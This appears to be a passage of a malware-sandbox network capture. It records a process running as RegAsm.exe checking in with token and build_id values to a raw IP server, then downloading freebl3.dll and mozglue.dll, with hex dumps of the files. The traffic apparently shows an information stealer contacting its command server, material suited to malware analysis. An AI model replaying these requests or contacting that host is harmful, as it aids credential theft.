                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:09 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------GCFIIEBKEGHJJJJJJDAACont
                                                                                  2024-05-24 15:47:10 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.64972265.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:10 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:10 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------FIEGCBKEGCFCBFIDBFIICont
                                                                                  2024-05-24 15:47:11 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.64972365.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:12 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:12 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:12 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 685392
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-a7550"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:12 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                  Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                  Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                  Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                  Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                  Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                  Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                  Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                  Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                  Data Ascii: 0<48%8A)$(


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.64972765.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:14 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:14 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:14 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 608080
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-94750"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:14 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                  Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                  Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                  Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                  Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                  Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
